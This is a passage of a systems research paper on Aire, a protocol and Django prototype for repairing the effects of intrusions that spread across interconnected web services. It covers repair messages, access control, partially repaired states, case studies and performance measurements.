To allow the client to use the same authentication mechanism during repair, the service sends only a response repair token to the client’s notifier URL, instead of the entire replace_response call; when a client receives a response repair token, it contacts the server and asks the server to provide the replace_response call for that token. This way, the client can appropriately authenticate the server, by validating its X.509 certificate. Integrating Aire with HTTP. In order to name requests and responses during subsequent repair operations, Aire must assign a name to every one of them. To do this, Aire interposes on all HTTP requests and responses during normal operation, and adds headers specifying a unique identifier that will be used to name every request. To ensure these identifiers uniquely name a request (or response) on a particular server, Aire assigns the identifier on the service handling the request (or receiving the response); it becomes the responsibility of the other party to remember this identifier for future repair operations. Specifically, Aire adds an Aire-Response-Id: header to every HTTP request issued from a web service; this identifier will name the corresponding response. The server receiving this request will store the response identifier, and will use it later if the response must be repaired. Conversely, Aire adds an Aire-Request-Id: header to every HTTP response produced by a web service; this identifier assigns a name to the HTTP request that triggered this response. A client can use this identifier to refer to the corresponding request during subsequent repair. Aire also adds an Aire-Notifier-URL: header to every issued request. To make it easier for clients to use Aire’s repair interface, Aire’s repair API encodes the request being repaired (e.g., new_request for replace) in the same way as the web service would normally encode this request. 
The type of repair operation being performed (e.g., replace or delete) is sent in an Aire-Repair: HTTP header, and the request_id being repaired is sent in an Aire-Request-Id: header. Thus, to fix a previous request, the client simply issues the corrected version of the request as it normally would, and adds the Aire-Repair: replace and Aire-Request-Id: headers to indicate that this request should replace a past operation. In addition to requiring relatively few changes to client code, this also avoids introducing infrastructure changes (e.g., modifying firewall rules to expose a new service). 3.2 Local repair As part of local repair of a service, Aire re-executes API operations that were affected by the attack. It is possible that one of these operations will execute differently due to repair, and issue a new HTTP request that it did not issue during the original execution. In that case, Aire must issue a create repair call to the corresponding web service, in order to create a new request “in the past.” Re-execution can also cause the arguments of a previously issued request to change, in which case Aire queues a replace message to the remote web service in question. One difficulty with both create and replace calls is that to complete local repair, the application needs a response to the HTTP requests in these calls. However, Aire cannot block local repair waiting for the response. To resolve this tension, Aire tentatively returns a “time-out” response to the application’s request, which any application must already be prepared to deal with; this allows local repair to proceed. Once the remote web service processes the create or replace operation, it will send back a replace_response that replaces the time-out response with the actual response to the application’s request. At this point, Aire will perform another repair to fix up the response. When re-execution skips a previously issued request altogether, Aire queues a delete message. 
Finally, if re-execution changes the response of a previously executed request, or computes the response for a newly created request, Aire queues a replace_response message. Aire maintains an outgoing queue of repair messages for each remote web service. If multiple repair messages refer to the same request or the same response, Aire can collapse them, by keeping only the most recent repair message. Sometimes, Aire might be unable to send a repair message, either because the original request or response did not include the dependency-tracking HTTP headers identifying the web service to send the message to, or because the communication to the remote web service timed out; in either case, Aire notifies the application (as we discuss in §4). Aire also aggregates incoming repair messages in an incoming queue, and can apply the changes requested by multiple repair operations as part of a single local repair. 3.3 Convergence Recall that Aire’s goal is to produce a state that is consistent with the attack never having taken place (attack-free for short). We will now informally argue that Aire’s repair protocol converges to this state, assuming no failures (e.g., unreachable services or insufficient credentials, which are discussed in the next section). Consider the list \( L \) of all messages (requests and responses between services) that were affected by the attack, sorted by receive time. We will argue that Aire eventually repairs the recipients of all these messages (i.e., servers that ran affected requests or clients that received affected responses). For simplicity, assume that each service keeps a complete timeline of its state (e.g., a checkpoint at every point in time), and that each service handled a request or response instantaneously at the time it was received. As repair messages propagate between services, the state timeline of each service will be repaired up to increasingly more recent points in time, eventually reaching the present. 
The first message in \( L \) must be the initial attack at time \( t_0 \). Local repair rolls back any state modified as a result of this message to before \( t_0 \), and possibly re-executes some operations on that service. Since inputs to the service up to and including \( t_0 \) are now attack-free, the state timeline of that service is now attack-free up to and including \( t_0 \). All other services are also attack-free up to and including \( t_0 \), since the attack did not propagate to any other services as of \( t_0 \). Now we argue by induction on the times at which messages in \( L \) were received. Suppose that all state timelines are attack-free as of some \( t_i \), and the next message \( m \) in \( L \) is at \( t_{i+1} > t_i \). Consider the service \( s \) that sent \( m \) as a result of some execution \( e \). We know that \( m \) was sent at or before \( t_{i+1} \), that \( s \) received no attack-affected message between \( t_i \) and \( t_{i+1} \), and that the timeline of \( s \) is attack-free up to and including \( t_i \). This means that all inputs to \( e \) up to the point when it sent \( m \) are now attack-free. Thus, local repair on \( s \) will re-execute \( e \), produce the attack-free version of \( m \), and send a repair message for \( m \). Once the recipient of this repair message performs local repair, its timeline (and the timelines of all other services) will be attack-free up to and including \( t_{i+1} \). By induction, Aire will eventually repair all timelines to the present. In addition to producing the goal state, we would like Aire to eventually stop sending repair messages. This is true as long as the local repair implementation is stable: that is, when processing a repair message for time \( t \), it produces repair messages only for requests or responses at times after \( t \) (i.e., does not change its mind about previous messages). 
Stable local repair ensures that repair messages progress forward in time starting from the attack, and eventually converge upon reaching the present time. Local repair is stable if re-execution is deterministic, which Aire achieves by recording and replaying sources of non-determinism as in Warp [7]. 4 Repair access control Access control is important because Aire’s repair itself must not enable new ways for adversaries to propagate from one compromised web service to another. For example, a hypothetical design that allows any client with a valid request identifier to issue repair calls for that request is unsuitable, because an adversary that compromises a service storing many past request identifiers would be able to make arbitrary changes to those past requests, affecting many other services; this is something an attacker would not be able to do in the absence of Aire. Aire requires that every repair API call be accompanied with credentials to authorize the repair operation. Aire delegates access control decisions to the application because principal types, format of credentials, and access control policies can be application-specific. For example, some applications may use cookies for authentication while others may include an access token as an additional HTTP header; and some applications may allow any user with a currently valid account to repair a past request issued by that user, while others may allow only users with special privileges to invoke repair. In the special case of replace_response messages, the repair message can be authenticated using the server’s X.509 certificate, as discussed in §3.1, although an application developer can require (and supply) other credentials if needed. The interface between Aire and an Aire-enabled service is shown in Table 2.
Services running Aire export an authorize function that Aire invokes when it receives a repair message; Aire passes to the function the type of repair operation (create, replace, delete, or replace_response), and the original and new versions of the request or response to repair (denoted by the original and repaired parameters). The authorize function’s return value indicates whether the repair should be allowed (using credentials from the repaired message); if the repair is not allowed, Aire returns an authorization error for the repair message. To perform access control checks, the service may need to read old database state (e.g., to look up the principal that issued the original request). For this purpose, Aire provides the application read-only access to a snapshot of Aire’s versioned database at the time when the original request executed; the specific interface depends on how the application’s web framework provides database access (e.g., Django’s ORM). Once a repair operation is authorized, Aire re-executes the new request, if any. As part of request re-execution, the application can apply other authorization checks, in the same way that it does for any other request during normal operation. If a repair message sent to a remote server returns an authorization error (e.g., because the credentials have expired) or times out, Aire notifies the application of the error by invoking the notify function (and continues to process other repairs in the meantime). Once the application obtains appropriate credentials for a failed repair operation, it can use the retry function to ask Aire to resend the repair message. In the OAuth example above, the client application could display the failed repair message to the user whose OAuth token was stale, and prompt the user for a fresh OAuth token or ask if the message should be dropped altogether.
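A service's authorize hook might look like the following sketch. The policy shown is only an example, not Aire's: it allows a repair only if it carries the credentials of the principal who issued the original request. The `snapshot` argument is our stand-in for the read-only database snapshot Aire provides.

```python
# Hypothetical authorize hook in the shape of Table 2 (example policy,
# not Aire's actual code).

def authorize(repair_type, original, repaired, snapshot):
    if repair_type == 'replace_response':
        # Already authenticated by validating the server's X.509
        # certificate, as described in the repair protocol.
        return True
    # Look up the principal of the original request in the snapshot of
    # the database at the time that request executed.
    owner = snapshot.principal_for(original['request_id'])
    return repaired.get('credentials') == owner
```

If `authorize` returns false, Aire would answer the repair message with an authorization error; the remote service can later retry with fresh credentials.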
5 Reasoning about partially repaired state Aire’s asynchronous repair exposes the state of a service to its clients immediately after local repair is done, without waiting for repair to complete on other affected services. In principle, for a distributed system composed of arbitrary, tightly coupled services, a partially repaired state can appear invalid to clients of the services. For example, if one of the services is a lock service, and during repair it grants a lock to a different application than it did during original execution, then in some partially repaired state both the applications could be holding the lock; this violates the service’s invariant that only one application can hold a lock at any time, and can confuse applications that observe this partially repaired state. However, Aire is targeted at web services, which are loosely coupled, in part because they are under different administrative domains and cannot rely on each other to be always available. In practice, for such loosely coupled web service APIs, exposing partially repaired states does not violate their invariants. In the rest of this section, we first present a model to reason about partially repaired states, and then provide an example of how a developer can modify a service to handle partially repaired states if necessary. 5.1 Modeling repair as API invocations Many web services and their clients are designed to deal with concurrent operations, and so web application developers already have to reason about concurrent updates.
<table> <thead> <tr> <th>Function and parameters</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>Functions implemented by the web service and invoked by Aire</td> <td></td> </tr> <tr> <td>authorize (repair_type, original, repaired)</td> <td>Checks if a repair message should be allowed</td> </tr> <tr> <td>notify (msg_id, repair_type, original, repaired, error)</td> <td>Notifies application of a problem with a remote repair message</td> </tr> <tr> <td>Functions implemented by Aire and invoked by the web service</td> <td></td> </tr> <tr> <td>retry (msg_id, updated_repair_type, updated_message)</td> <td>Resends a repair message</td> </tr> </tbody> </table>

**Table 2:** The interface between Aire and the web service.

For example, Amazon S3, a popular web service offering a data storage interface, supports both a simple PUT/GET interface that provides last-writer-wins semantics in the face of concurrency, and an object versioning API that helps clients deal with concurrent writes. Building on this observation, we propose a contract: any repair of a service should be indistinguishable from a hypothetical repair client performing normal API calls to the service, in the present time. Note that this is just a way of reasoning about what effects a repair can have; Aire’s repair algorithm does not actually construct such a sequence of API calls. If repair operations are equivalent to a concurrent client, then application developers can handle partially repaired states simply by reasoning about this additional concurrent client, rather than having to reason about all possible timelines in which concurrent repair operations are happening. In particular, applications that already handle arbitrary concurrent clients require no changes to properly handle partially repaired states. This model fits many existing web services. For example, consider the scenario in Figure 2, illustrating operations on object X stored in Amazon S3. Initially, X had the value a.
At time t1, an attacker writes the value b to X. At time t2, client A reads the value of X and gets back b. At time t3 the client reads the value of X again. In the absence of repair or any concurrent operations, A should receive the value b. But what should happen if, between t2 and t3, Amazon S3 determines that the attacker’s write was erroneous and repairs its local state, reverting X to a? A could observe the partially repaired state between when local repair on S3 completed (which is sometime between t2 and t3) and when A finally receives the replace_response message; A sees this state as valid (with its first get(x) returning b and its second get(x) returning a), because a hypothetical repair client could have issued a put(x, a) in the meantime.
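For a last-writer-wins PUT/GET interface, this contract is easy to see in code. The toy store below is our own sketch (not S3's API): repairing the attacker's write is implemented as an ordinary put, so no client can distinguish repair from a concurrent writer.

```python
# Toy last-writer-wins key-value store (a sketch, not Amazon S3's API).

class LWWStore:
    def __init__(self):
        self.data = {}

    def put(self, key, value):
        self.data[key] = value      # last writer wins

    def get(self, key):
        return self.data.get(key)

    def repair(self, key, value):
        # Repair is just a put, i.e., indistinguishable from a
        # hypothetical concurrent "repair client".
        self.put(key, value)
```

Replaying the t1-t3 timeline against this store shows that every state a client observes is one some concurrent writer could have produced.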
5.2 Making service APIs repairable A web service with many concurrent clients that offers only a simple PUT/GET interface can handle partially repaired states, because clients cannot make any assumptions about the state of the service in the face of concurrency. However, some web service APIs provide stronger invariants that require application changes to properly handle partial repair. For example, some web services provide a versioning API that guarantees an immutable history of versions (as we discuss in §7.3). Suppose client A from our earlier example in Figure 2 asked the server for a set of all versions of X, instead of a get on the latest version. At time t2, A would receive the set of versions {a, b}. If repair simply rolled back the state of X between t2 and t3, A would receive the set of versions {a} at time t3 with b removed from the set, a state that no concurrent writer could have produced using the versioning API. The rest of this section describes how a developer can modify an application to handle partially repaired states, using a versioning interface as an example. Consider a web service API that provides a single, linear history of versions for an object. Once a client performs a put(x, b), the value b must appear in the history of values of x (until old versions are garbage-collected). If the put(x, b) was erroneous and needs to be deleted, what partially repaired state can the service expose? Removing b from the version history altogether would be inconsistent if the service does not provide any API to delete old versions, and might confuse clients that rely on past versions to be immutable. On the other hand, appending new versions to the history (i.e., writing a new fixed-up value) prevents Aire from repairing past responses. In particular, if a past request asked for a set of versions, Aire would have to send a new set of versions to that client (using replace_response) where the effects of b have been removed. 
However, if Aire extends that past version history by appending a new version that reverts b, this synthesized history would be inconsistent with the present history. One way to handle partial repair with a versioning API is to extend the API to support branches, similar to the model used by git [6]. With an API that supports branches, when a past request needs to be repaired, Aire can create a new branch that contains a repaired set of changes, and move the “current” pointer to the new branch, while preserving the original branch. This allows the API to handle partially repaired states, and has the added benefit of preserving the original version history. For example, consider a simple key-value store that maintains a history of all values for each key, as illustrated in Figure 3. In addition to put and get calls, the key-value store provides a versions(x) call that returns all previous versions of key x. During repair, request put(x, b) is deleted. An API with linear history does not allow clients to handle partial repair (as discussed above), but a branching API does. With branches, repair creates a new branch (shown in the right half of Figure 3), and re-applies legitimate changes to that branch, such as put(x, c). These changes will create new versions on the new branch, such as v5 mirroring the original v3 (the application must ensure that version numbers themselves are opaque identifiers, even though we use sequential numbers in the figure). At the end of local repair, Aire exposes the repaired state, with the “current” branch pointer moved to the repaired branch. This change is consistent with concurrent operations performed through the regular web service API. For requests whose responses changed due to repair, Aire sends replace_response messages that contain the new responses: for a get request, the new response is the repaired value at the logical execution time of the request, and for a versions request, it contains only the versions created before the logical execution time of the request.
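The branching scheme can be sketched as a toy store in which versions are immutable and only the "current" pointer moves. This is our own illustration, not Aire's implementation, and version ids are assigned sequentially here, so they differ from the figure's numbering.

```python
# Sketch of a branching version history for a single key (illustrative).

class BranchedStore:
    def __init__(self):
        self.parent = {}    # version_id -> parent version_id (immutable)
        self.value = {}     # version_id -> value (immutable)
        self.current = None # mutable pointer to the head of the current branch
        self._next = 1

    def put(self, value):
        vid = 'v%d' % self._next
        self._next += 1
        self.parent[vid], self.value[vid] = self.current, value
        self.current = vid
        return vid

    def get(self):
        return self.value[self.current] if self.current else None

    def chain(self, head=None):
        """Version ids from the root to the given head (default: current)."""
        vid, out = head or self.current, []
        while vid:
            out.append(vid)
            vid = self.parent[vid]
        return out[::-1]

    def repair(self, base, dropped):
        """Branch off `base`, skipping `dropped` versions and re-applying
        the values of the remaining later versions; the old branch and
        all its versions are preserved."""
        old_head = self.current
        tail = [v for v in self.chain() if v not in dropped]
        tail = tail[tail.index(base) + 1:]
        self.current = base
        for v in tail:
            self.put(self.value[v])   # mirror each legitimate write
        return old_head
```

Deleting the attacker's put leaves the original chain intact while clients follow the moved "current" pointer onto the repaired branch.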
In the example of Figure 3, the new response for get(x) is a (replacing b), while the new response for the versions(x) call is {v1, v2, v3, v5} (replacing {v1, v2, v3}), and does not contain v4 and v6. Figure 3: Repair of a single key in a versioned key-value store. Repair starts when the shaded operation put(x, b) from the original history, shown on the left, is deleted. This leads to the repaired history of operations shown on the right. The version history exposed by the API is shown in the middle, with two branches: the original chain of versions, shown with solid lines, and the repaired chain of versions, dotted. In each immutable version w:v, w is the version number and v is the value of the key. The mutable “current” pointer moves from one branch to another as part of repair. 6 Implementation We implemented a prototype of Aire for the Django web application framework [2]. Aire leverages Django’s HTTP request processing layer and its object-relational mapper (ORM). The ORM abstracts data stored in an application’s database as Python classes (called “models”) and relations between them; an instance of a model is called a model object. We modified the Django HTTP request processor and the Python httplib library functions to intercept incoming and outgoing HTTP requests, assign IDs to them, and record them in the repair log. To implement versioning of model objects, we modified the Django ORM to intercept the application’s reads and writes to model objects. On a write, Aire transparently creates a new version of the object, and on a read, it fetches the latest version during normal execution and the correct past version during local repair. Aire rolls back a model object to time t by deleting all versions after t. In addition to tracking dependencies between writes and reads to the same model, Aire also tracks dependencies between models (such as unique key and foreign key relationships) and uses them to propagate repair.
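The per-object versioning just described can be sketched as follows. This is an illustrative stand-in: the real system hooks Django's ORM rather than wrapping a Python list.

```python
# Sketch of per-model-object versioning (illustrative, not Aire's code).

class VersionedObject:
    def __init__(self):
        self.history = []  # (time, value) pairs, appended on every write

    def write(self, t, value):
        self.history.append((t, value))   # a write creates a new version

    def read(self, as_of=None):
        """Latest version during normal execution; the version as of the
        given time during local repair."""
        visible = [v for ts, v in self.history
                   if as_of is None or ts <= as_of]
        return visible[-1] if visible else None

    def rollback(self, t):
        """Roll the object back to time t by deleting later versions."""
        self.history = [(ts, v) for ts, v in self.history if ts <= t]
```

During repair, re-executed requests read with `as_of` set to their original execution time, while rollback simply truncates the version list.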
We modified about 3,000 lines of code in Django to implement the Aire interceptors; the Aire repair controller was another 2,800 lines of Python code.

**Repair for a versioned API.** If a service implements versioning, it indicates this to Aire by making the model class for its immutable versions a subclass of Aire's AppVersionedModel class. AppVersionedModel objects are not rolled back during repair, and Aire does not perform versioning for these objects. If other model objects store references to AppVersionedModel objects, Aire rolls those other objects back during repair.

7 Application case studies

This section answers the following questions:

- What kinds of attacks can Aire recover from?
- How much of the system is repaired if some services are offline or authorization fails at a service?
- How much effort is required to start using Aire in an existing application?

7.1 Intrusion recovery

As we do not know of any significant compromises that propagated through interconnected web services to date, to evaluate the kinds of attacks that Aire can handle, we implemented four attack scenarios and attempted to recover from each attack using Aire. The rest of this subsection describes these scenarios and how Aire handled the attacks.

**Askbot.** A common pattern of integration between web services is to use OAuth or OpenID providers like Facebook, Google, or Yahoo, to authenticate users. If an attacker compromises the provider, she can spread an attack to services that depend on the provider. To demonstrate that Aire can recover from such attacks, we evaluated Aire using real web applications, with an attack that exploits a vulnerability similar to the ones recently discovered in Facebook [9, 10].
The system for the scenario consists of three large open-source Django web services: Askbot [1], which is an open-source question and answer forum similar to Stack Overflow and used by sites like the Fedora Project; Dpaste, a Django-based pastebin service, which allows posting and sharing of code snippets; and a Django-based OAuth service. These three services together comprise 183,000 lines of Python code, excluding blank lines and comments. Askbot maintains a significant amount of state, including questions and answers, tags, user profiles, ratings, and so on, which Aire must repair. We modified Askbot to integrate with Django OAuth and Dpaste, which it did not do out-of-the-box; these modifications took 74 and 27 lines of Python code, respectively. The attack scenario is shown in Figure 4. We configured Askbot to allow users to sign up using accounts from an external OAuth provider service that we set up for this purpose. A user’s signup in our Askbot setup is depicted by the requests 2-4 in Figure 4. As is typical in an OAuth handshake, Askbot redirects the user to the OAuth provider service. The user logs in to the OAuth service, and the OAuth service grants an OAuth token to Askbot if the user allows it to do so. To keep Figure 4 simple, only the first request in the OAuth handshake (request 2) is shown. Once Askbot gets an OAuth token for the user, it allows the user to register with an email address (request 3) that it verifies with the OAuth service using the user’s OAuth token (request 4). If the verification succeeds, Askbot creates a local account for the user and allows the user to post and view questions and answers. In addition to OAuth integration, we also modified Askbot to integrate with Dpaste; if a user’s Askbot post contains a code snippet, Askbot posts this code to the Dpaste service for easy viewing and downloading by other users. Finally, the Askbot service also sends users a daily email summarizing that day’s activity. 
These loosely coupled dependencies between the services mimic the dependencies that real web services have on each other. The attack we simulate in this scenario is based on a recent Facebook vulnerability [9]. To enable the attack, we added a debug configuration option in the OAuth service that always allows email verification to succeed (adding this option required modifying 13 lines of Python code in the OAuth service). The administrator mistakenly turns this option on in production by issuing request 1, thus exposing the vulnerability. The attacker exploits this vulnerability in the OAuth service to sign up with Askbot as a victim user (requests 2-4) and post a question with some code (request 5), thereby spreading the attack from the OAuth service to Askbot. Askbot automatically posts this code snippet to Dpaste (request 6), spreading the attack further. Later, a legitimate user views and downloads this code from Dpaste, and at an even later time, Askbot sends a daily email summary containing the attacker's question, creating an external event that depends on the attack; neither of these events is shown in the figure. Before, after, and during the attack, other legitimate users continue to use the system, logging in, viewing and posting questions and answers, and downloading code from the Dpaste service. Some actions of these legitimate users, such as posting their own questions, are not dependent on the attack, while others, such as reading the attacker's question, are dependent.

We used Aire to recover from the attack. The administrator starts repair by invoking a delete operation on request 1, which introduced the vulnerability. The delete is shown by the dotted arrow corresponding to 1 in Figure 4. This initiates local repair on the OAuth service, which deletes the misconfiguration, and invokes a replace_response operation on request 4 with an error value for the new response.
The replace_response propagates repair to Askbot: as requests 3 and 5 depend on the response to request 4, local repair on Askbot re-executes them using the new error response, thereby undoing the attacker's sign-up (request 3) and the attacker's post (request 5). Local repair on Askbot also runs a compensating action for the daily summary email, which notifies the Askbot administrator of the new email contents without the attacker's question; it re-executes all legitimate user requests that depended on the attack requests; and finally it invokes a delete operation on Dpaste to cancel request 6. Dpaste in turn performs local repair, resulting in the attacker's code being deleted, and a notification being sent to the user who downloaded the code. This completes recovery, which removes all the effects of the attack and does not change past legitimate actions in the system that were not affected by the attack.

**Lax permissions.** A common source of security vulnerabilities comes from setting improper permissions. In a distributed setting, we consider a scenario where one service maintains an authoritative copy of an access control list, and periodically updates permissions on other services based on this list, similar to the example presented in §1 to motivate the need for Aire. If a mistake is made in the master list, it is important not only to propagate a remedy to other services, but also to undo any requests that took advantage of the mistake on those services. Since Askbot did not natively support such a permission model, we implemented our own spreadsheet service for this scenario. The spreadsheet service has a simple scripting capability similar to Google Apps Script [12]. This allows a user to attach a script to a set of cells, which executes when values in cells change. We use scripting to implement a simple distribution mechanism for access control lists (ACLs). The setup is shown in Figure 5.
The ACL directory is a spreadsheet service that stores the master copy of the ACL for the other two spreadsheet services. A script on the directory updates the ACLs on the other services when an ACL on the directory is modified. The attack is as follows: an administrator mistakenly adds an attacker to the master copy of the ACL by issuing a request to update the ACL directory; the ACL script distributes the new ACL to spreadsheets A and B. Later, the attacker takes advantage of these extra privileges to corrupt some cells in both spreadsheets. All this happens while legitimate users are also using the services. Once the administrator realizes his mistake, he initiates repair by invoking a delete operation on the ACL directory to cancel his update to the ACL. The ACL directory reverts the update, and invokes delete on the two requests made by its script to distribute the corrupt ACL to the two services. This causes local repair on each of the two services, which rolls back the corrupt ACL. All the requests since the corrupt ACL’s distribution are re-executed, as every request to the service checks the ACL. As the attacker is no longer in the ACL, her requests fail, whereas the requests of legitimate users succeed; Aire thereby cleans up the attacker’s corrupt updates while preserving the updates made by legitimate users. **Lax permissions on the configuration server.** A more complex form of the above attack could take place if the ACL directory itself is misconfigured. For example, suppose the administrator does not make any mistakes in the ACLs in the directory, but instead accidentally makes the directory world-writable. An adversary could then add herself to the master copy of the ACL for spreadsheets A and B, wait for updates to propagate to A and B, and then modify data in those spreadsheets as above. Recovery in this case is more complicated, as it needs to revert the attacker’s changes to the ACL directory in addition to the spreadsheet servers. 
Repair is initiated by the administrator invoking a delete operation on his request that configured the ACL directory to be world-writable. This initiates local repair on the ACL directory, reverting its permissions to what they were before, and cancels the attacker's request that updated the ACL. This triggers the rest of the repair as in the previous scenario, and fully undoes the attack.

**Propagation of corrupt data.** Another common pattern of integration between services is synchronization of data, such as notes and documents, between services. If an attack corrupts data on one service, it automatically spreads to the other services that synchronize with it. To evaluate Aire's repair for synchronized services, we reused the spreadsheet application and the setup from the previous scenarios, and added synchronization of a set of cells from spreadsheet service A to spreadsheet service B. A script on A updates the cells on B whenever the cells on A are modified. As before, the attack is enabled by the administrator mistakenly adding the attacker to the ACL. However, the attacker now corrupts a cell only in service A, and the script on A automatically propagates the corruption to B. Repair is initiated, as before, with a delete operation on the ACL directory. In addition to the repair steps performed in the previous scenario, after service A completes its local repair, it invokes a delete operation on service B to cancel the synchronization script's update of B's cell. This reverts the updates made by the synchronization, thereby showing that Aire can track and repair attacks that spread via data synchronization as well.

Figure 5: ACL directory server and spreadsheet services.

7.2 Partial repair propagation

Repair might not propagate to all services if some services are offline during repair or a service rejects a repair message as unauthorized.
To evaluate Aire’s partial repair due to offline services, we re-ran the Askbot repair experiment with Dpaste offline during repair. Local repair runs on both the OAuth and Askbot services; the vulnerability in the OAuth service is fixed and the attacker’s post to Askbot is deleted. Clients interacting with the OAuth and Askbot services see the state with the attacker’s post deleted, which is a valid state, as this could have resulted due to a concurrent operation by another client. Most importantly, this partially repaired state immediately prevents any further attacks using that vulnerability, without having to wait for Dpaste to be online. Once Dpaste comes online, repair propagates to it and deletes the attacker’s post on it as well. When we re-ran the experiment and never brought Dpaste back online, Aire on Askbot timed out attempting to send the delete message to Dpaste, and notified the Askbot administrator, so that he could take remedial action. We also ran the spreadsheet experiments with service B offline. In all cases, this results in local repair on service A, which repairs the corrupted cells on A, and prevents further unauthorized access to A. Once B comes online and the directory server or A or both propagate repair to it (depending on the specific scenario), B is repaired as well. Similar to the offline scenario in Askbot, clients accessing the services at any time find the services’ state to be valid; all repairs to the services are indistinguishable from concurrent updates. Finally, we used the spreadsheet experiments to evaluate partial repair due to an authorization failure of a repair message. We use an OAuth-like scheme for spreadsheet services to authenticate each other—when a script in a spreadsheet service communicates with another service, it presents a token supplied by the user who created the script. 
The spreadsheet services implement an access control policy that allows repair of a past request only if the repair message has a valid token for the same user on whose behalf the request was originally issued. We ran the spreadsheet experiments and initiated repair after the user tokens for service B had expired. This caused service B to reject any repair messages, and Aire effectively treats it as offline; this results in partially repaired state as in the offline experiment described before. On the next login of the user who created the script, the directory service or A (depending on the experiment) presents the user with the list of pending repair messages. If the user refreshes the token for service B, Aire propagates repair to B, repairing it as well. The results of these three experiments demonstrate that Aire's partial repair can repair the subset of services that are online, and propagate repair once offline services or appropriate credentials become available.

| Service      | Simple CRUD | Versioned | Description          |
|--------------|-------------|-----------|----------------------|
| Amazon S3    | ✓           | ✓         | Simple file storage  |
| Google Docs  | ✓           | ✓         | Office applications  |
| Google Drive | ✓           | ✓         | File hosting         |
| Dropbox      | ✓           | ✓         | File hosting         |
| Github       | ✓           | ✓         | Project hosting      |
| Facebook     | ✓           |           | Social networking    |
| Twitter      | ✓           |           | Social microblogging |
| Flickr       | ✓           |           | Photo sharing        |
| Salesforce   | ✓           |           | Web-based CRM        |
| Heroku       | ✓           |           | Cloud apps platform  |

Table 3: Kinds of interfaces provided by popular web service APIs to their clients.
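The token-based repair authorization policy described above (a repair message is accepted only if it carries a valid, unexpired token for the same user who issued the original request) can be sketched as follows. This is a hypothetical illustration; the function and argument names are ours, not Aire's, and real token validation would involve cryptographic checks rather than string comparison.

```python
# Hedged sketch of a repair access-control check. A repair message is
# authorized only if its token matches a valid, unexpired token for the
# user on whose behalf the original request was issued.
def authorize(repair_msg, original_request, tokens):
    """tokens maps user -> (token, expiry timestamp); names illustrative."""
    user = original_request["user"]
    entry = tokens.get(user)
    if entry is None:
        return False                 # no token on file for this user
    token, expiry = entry
    if repair_msg["token"] != token:
        return False                 # token is for a different user/session
    if expiry <= repair_msg["now"]:
        return False                 # expired: sender is treated as offline
    return True
```

When this check fails (for example, because the token expired), the paper's design has the sender treat the rejecting service as offline and queue the repair message for later retry, rather than abort repair.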
7.3 Porting applications to use Aire

Porting an application to use Aire involves changes both on the client and the server side of that application's interface. This section explores the two in turn, demonstrating that Aire requires few changes to both client-side and server-side code to support repair.

**Client-side porting effort.** Clients of an Aire-enabled service must be prepared to deal with partially repaired states. To understand what would be involved for a client to handle such states, we examined the interfaces of 10 popular web services for operations that might expose inconsistencies as a result of partial repair. We found that the APIs fell into two categories, as shown in Table 3. Every service offered a simple CRUD (create, read, update, delete) interface on the resource objects exported by the service. There is no concurrency control for the simple CRUD operations, and if multiple updates happen simultaneously, the last update wins. For such services, handling partial repair in a client boils down to assuming there is an additional repair client that can perform updates at any moment. In many situations, clients are already prepared to deal with concurrent updates from other clients, and thus would require little additional effort to support Aire.

Half of the services studied also provide a versioning API to deal with concurrent updates, typically exposing a linear history of immutable versions for each resource. These APIs allow clients to fetch a resource's version list, to perform an update only if a resource is at the right version, and to restore a resource to a past version (which creates a new version with the contents of the past version). In this case, the interface would have to be changed to support branching, as discussed in §5.2 (for services that don't already support it).
The client would then be able to assume that existing versions on a branch are immutable, but that the current branch pointer could be switched by a concurrent repair client at any time.

**Server-side porting effort.** To evaluate the effort of adapting server-side application code to use Aire, we measured the lines of code we changed in the Askbot, Dpaste, and Django OAuth applications to support Aire as described in §7.1. These three applications comprise 183,000 lines of code in total, excluding comments and blank lines. To run these applications with Aire, we added an `authorize` function to implement a repair access control policy. The policy allows repair of a past request only if the repair message is issued on behalf of the same user who issued the past request. Implementing the `authorize` function took 55 lines of Python code. For the spreadsheet application, we used the same access control policy and `authorize` implementation. We also implemented support for user-initiated retry of repair, using the `notify` and `retry` interface, which we used in our partial repair experiments (§7.2). Adding this capability to the spreadsheet application required 26 lines of code (for comparison, the entire spreadsheet application is 925 lines of code).

To evaluate the difficulty of implementing an Aire-compatible service with a versioning API, we again used our spreadsheet example application. We first implemented a simple linear versioning scheme, where each version is just an incrementing counter. We then extended it to support version trees so that clients could handle Aire's partial repair. This involved adding parent and timestamp fields to each version, and a pointer to the current version for each cell. This required modifying 44 lines of code.

8 Performance evaluation

To evaluate Aire's performance, this section answers the following questions:

- What is the overhead of Aire during normal operation, in terms of CPU overhead and disk space?
- How long does repair take on each service, and for the entire system?

We performed experiments on a server with a 2.80 GHz Intel Core i7-860 processor and 8 GB of RAM running Ubuntu 12.10. As our prototype's local repair is currently sequential, we used a single core with hyperthreading turned off to make it easier to reason about overhead.

8.1 Overhead during normal operation

To measure Aire's overhead during normal operation, we ran Askbot with and without Aire under two workloads: a write-heavy workload that creates new Askbot questions as fast as it can, and a read-heavy workload that repeatedly queries for the list of all the questions. During both workloads, the server experienced 100% CPU load. Table 4 shows the throughput of Askbot in these experiments, and the size of Aire's logs. Aire incurs a CPU overhead of 19% and 30%, and a per-request storage overhead of 5.52 KB and 9.24 KB (or 8 GB and 12 GB per day) for the two workloads, respectively. One year of logs should fit in a 3 TB drive at this worst-case rate, allowing for recovery from attacks during that period.

8.2 Repair performance

To evaluate Aire's repair performance, we used the Askbot attack scenario from §7.1. We constructed a workload with 100 legitimate users and one victim user. The attacker signs up as the victim and performs the attack; during this time, each legitimate user logs in, posts 5 questions, views the list of questions, and logs out. Afterwards, we performed repair to recover from the attack. The results of the experiment are shown in Table 5. The two requests repaired in the OAuth service are requests 1 and 4 in Figure 4, and the one request repaired in Dpaste is request 6. The repair messages sent by OAuth and Askbot are the `replace_response` for request 4 and the `delete` for request 6, respectively. Askbot does not send `replace_response` for requests 3 and 5, as the attacker's browser requests did not include an `Aire-Notifier-URL` header.
Local repair on Askbot re-executes only the requests affected by the attack (105 out of the 2196 total requests), which results in repair taking less than half the time taken for original execution. The attack affects so many requests because the attack question was posted at the beginning of the workload, so subsequent legitimate users' requests to view the questions page depended on the attack request that posted the question. These requests are re-executed when the attacker's request is canceled, and their repaired responses do not contain the attacker's question. Aire on Askbot does not send `replace_response` messages for these requests, as the users' browsers did not include an `Aire-Notifier-URL` header.

